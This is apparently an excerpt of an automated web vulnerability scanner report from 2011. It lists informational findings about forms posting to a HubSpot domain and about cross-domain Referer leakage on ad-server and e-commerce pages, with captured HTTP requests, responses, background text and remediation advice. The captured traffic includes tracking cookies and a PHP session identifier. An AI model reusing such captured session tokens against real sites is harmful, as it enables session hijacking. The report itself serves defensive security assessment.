Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.1.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A27%3A50; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
</p>

               <form action="http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.sophelle.com/Contact-Us/thank-you.html" >
...[SNIP]...

18.5. http://www.sophelle.com/Products/CQ/free-trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Products/CQ/free-trial.html

Issue detail

The page contains a form which POSTs data to the domain sophelle.web5.hubspot.com. The form contains the following fields:

Request

GET /Products/CQ/free-trial.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A05; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.5.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 11346
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "88c5d554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Free Trial Offer |
...[SNIP]...
</h2> -->
<form action="http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26423" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.sophelle.com/products/cq/thank-you-trial.html" >
...[SNIP]...

19. Cross-domain Referer leakage
There are 119 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


19.1. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 267
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>
...[SNIP]...

19.2. http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a248.e.akamai.net
Path:   /www.volusion.com/a1/js/js_all_min01.js

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /www.volusion.com/a1/js/js_all_min01.js?4 HTTP/1.1
Host: a248.e.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Thu, 15 Apr 2019 20:00:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:00 GMT
Content-Length: 90932
Connection: close

var curDomain;
setURI();

/*
* jquery.tools 1.1.2 - The missing UI library for the Web
*
* [tools.tabs-1.0.4, tools.tabs.slideshow-1.0.2, tools.tabs.history-1.0.2, tools.tooltip-1.1.3, tools
...[SNIP]...
<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a>
...[SNIP]...
           });
           $('#tweets').html(tweets);
       },
       complete: function() {
           rollTwits();
       }
   });

   if (document.location.protocol != "https:"){
       //load twitter btn (no ssl)
       $('.twitter').html('<a href="http://twitter.com/volusion" class="twitter-follow-button" data-text-color="#FFFFFF" data-link-color="#00AEFF">Follow @volusion</a>
...[SNIP]...
);
       });
       //load blog
       $('#blog_load').rssfeed('http://onlinebusiness.volusion.com/feed/rss2', {limit: 1, header: false, date: false});
   }else{
       //load twitter btn (ssl)
       $('.twitter').html('<a href="http://twitter.com/intent/user?screen_name=volusion" class="secure-follow-button" target="_blank"><span class="s_follow">
...[SNIP]...

19.3. https://account.bigcommerce.com/cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.bigcommerce.com
Path:   /cart.php

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /cart.php?a=add&pid=41&configure=true HTTP/1.1
Host: account.bigcommerce.com
Connection: keep-alive
Referer: https://account.bigcommerce.com/cart.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=7i6337nrbo47q0nk7ne0s5dboj3jrq7n; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413506396:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343306396:41658941.1.10.1315341506; 2__utmc=^first.1378413506396:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.2.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 33243
Connection: close
Content-Type: text/html; charset=iso-8859-1

           
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   <ti
...[SNIP]...
</p>
           
           <iframe src="https://www.facebook.com/plugins/likebox.php?id=165603319018&amp;width=280&amp;connections=0&amp;stream=false&amp;header=false&amp;height=820" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:285px; height:62px; -moz-border-radius:5px; -webkit-border-radius:5px; background:#bed1e1; margin-bottom:20px" allowTransparency="true"></iframe>
...[SNIP]...

19.4. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.38

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Date: Tue, 06 Sep 2011 15:10:51 GMT

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/4/67/%2a/d;243075555;0-0;0;70313744;4307-300/250;38606491/38624248/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=http://www.devry.edu/index.html?vc=200841&sc_1=2ODNDBOBALALTDEH&WT.mc_id=FY12_OLA_DeVryBaseline_2ODNDBOBALALTDEH"><img src="http://s0.2mdn.net/viewad/2049738/1-best_of300.jpg" border=0 alt="Advertisement"></a>

19.5. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia/B5646003.2

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=;ord=1315321144? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6342
Date: Tue, 06 Sep 2011 14:59:06 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Tue Apr 12 11:20:48 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=http://www.keller.edu/whykeller/career-advancement-support.jsp?vc=200848&sc_1=2OKNDCARSMCUSKCA&WT.mc_id=FY12_OLA_KellerBaseline_2OKNDCARSMCUSKCA"><img src="http://s0.2mdn.net/2185658/Keller_Career_Builder_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<!--
Evidon tag
Campaign: FY12 KGSM INQ GEN- BR
Client ID: 279
Notice ID: 1909
Ad Size: 300x250
-->
<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1909;crid=179;"></script>

19.6. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=774844395695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:34:05 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7760164" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7760164"/></a>
...[SNIP]...

19.7. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=186303742230? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:02:40 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/5096911" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/5096911"/></a>
...[SNIP]...

19.8. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=82868104801? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:28:56 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/6197540" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/6197540"/></a>
...[SNIP]...

19.9. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=913041004911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 432
Date: Tue, 06 Sep 2011 15:03:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/z;238944754;1-0;0;62912129;4307-300/250;43736632/43754419/1;;~okv=;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;~aopt=2/0/b7/0;~sscs=%3fhttp://www.cnbc.com/id/44037183"><img src="http://s0.2mdn.net/viewad/697683/ag911_300_wed.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

19.10. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=558747671777? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:49:14 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/1049994" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/1049994"/></a>
...[SNIP]...

19.11. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=819761534221? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 435
Date: Tue, 06 Sep 2011 14:56:36 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/u;238944754;2-0;0;62912129;4307-300/250;43446029/43463816/1;;~okv=;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;~aopt=2/0/b7/0;~sscs=%3fhttp://deliveringalpha.com/"><img src="http://s0.2mdn.net/viewad/697683/delivering_alpha_300.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

19.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=834450440481? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:04:49 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7533182" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7533182"/></a>
...[SNIP]...

19.13. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=638232543366? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1656
Date: Tue, 06 Sep 2011 16:04:29 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/466318?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B414
...[SNIP]...
